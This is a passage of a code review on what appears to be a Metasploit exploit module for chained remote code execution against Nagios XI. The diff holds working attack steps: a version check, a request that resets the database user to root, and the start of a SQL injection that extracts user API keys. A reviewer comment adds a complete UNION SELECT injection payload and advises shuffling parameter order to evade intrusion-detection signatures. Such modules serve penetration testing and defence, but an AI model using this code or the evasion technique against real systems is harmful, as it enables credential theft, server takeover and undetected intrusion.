modules/exploits/linux/http/nagios_xi_chained_rce_2_electric_boogaloo.rb

```diff
@@ -0,0 +1,367 @@
+      'DefaultTarget'   => 0))
+    register_options(
+      [
+        #WSFDelay option is being ignored, getting around this with a call to Rex.sleep
+        #Sometimes Nagios doesn't execute commands immediately, so play with this parameter.
+        Opt::RPORT(80), OptInt.new('WAIT', [ true, "Number of seconds to wait for exploit to run", 15 ])
+      ])
+    deregister_options('SRVHOST', 'SRVPORT')
+    end
+
+    def check
+      print_status "STEP 0: Get Nagios XI version string."
+      res = send_request_cgi!({
+          'method' => 'GET',
+          'uri'    => '/nagiosxi/'
+        })
+
+      if !res || !res.get_html_document
+        fail_with(Failure::Unknown, 'Could not check nagios version')
+      end
+
+      if (@version = res.get_html_document.at('//input[@name = "version"]/@value').text)
+        print_good("STEP 0: Found Nagios XI version: #{@version}")
+        if Gem::Version.new(@version) < target[:lower_version]
+          print_bad('Try nagios_xi_chained for this version.')
+        end
+        if (Gem::Version.new(@version) <= target[:upper_version] && Gem::Version.new(@version) >= target[:lower_version])
+          return CheckCode::Appears
+        end
+      end
+      CheckCode::Safe
+  end
+
+    def set_db_user(usr, passwd)
+        step = usr == 'root' ? "1" : "6.1"
+        print_status "STEP #{step}: Setting Nagios XI DB user to #{usr}."
+        res = send_request_cgi({
+          'uri' => '/nagiosql/admin/settings.php',
+          'method' => 'POST',
+          'ctype'  => 'application/x-www-form-urlencoded',
+          'encode_params' => true,
+          'vars_post'   => {
+                'txtRootPath'=>'nagiosql',
+                'txtBasePath'=>'/var/www/html/nagiosql/',
+                'selProtocol'=>'http',
+                'txtTempdir'=>'/tmp',
+                'selLanguage'=>'en_GB',
+                'txtEncoding'=>'utf-8',
+                'txtDBserver'=>'localhost',
+                'txtDBport'=>3306,
+                'txtDBname'=>'nagiosql',
+                'txtDBuser'=> usr,
+                'txtDBpass'=> passwd,
+                'txtLogoff'=>3600,
+                'txtLines'=>15,
+                'selSeldisable'=>1
+            }
+
+        })
+
+        if !res || res.code != 302
+          fail_with(Failure::UnexpectedReply,'STEP #{step}: Unexpected response setting db user to root')
+        else
+          print_status "STEP #{step}: Received a 302 Response. That's good!"
+        end
+    end
+
+    def get_api_keys
+        print_status 'STEP 2: Exploiting SQLi to extract user API keys.'
+
+        ver = @version.tr('.', '').to_i
+
+        sqli_parm = ver < 530 ? "backend_ticket" : "api_key"
+        sqli_val = rand_text_alpha(rand(5)+5)
+        res = send_request_cgi({
+            'uri' => '/nagiosql/admin/helpedit.php',
+            'method' => 'POST',
+            'ctype' => 'application/x-www-form-urlencoded',
+            'encode_params' => true,
+            'vars_post' => {
```

Comment:
**Pro-tip**: By randomising the parameter order, you increase the chances of bypassing intrusion detection signatures.
Most applications allow users to submit GET / POST parameters in any order.
LIke This:
```
res = send_request_cgi({
	'uri' => '/nagiosql/admin/helpedit.php',
        'method' => 'POST',
        'ctype' => 'application/x-www-form-urlencoded',
        'encode_params' => true,
   	'vars_post' => Hash[{ 
     	    'selInfoKey1'=>"#{sqli_val}'UNION SELECT CONCAT('START_API:',#{sqli_parm},':END_API') FROM nagiosxi.xi_users-- ",
            'hidKey1'=>'common',
            'selInfoKey2'=>'free_variables_name',
            'hidKey2'=>'',
            'selInfoVersion'=>'',
            'hidVersion'=>'',
            'taContent'=>'',
            'modus'=>0
             }.to_a.shuffle]
})
```
Be sure to test it.
You could apply the same principal to the other HTTP requests also.
Sorry if i made any typo mistakes.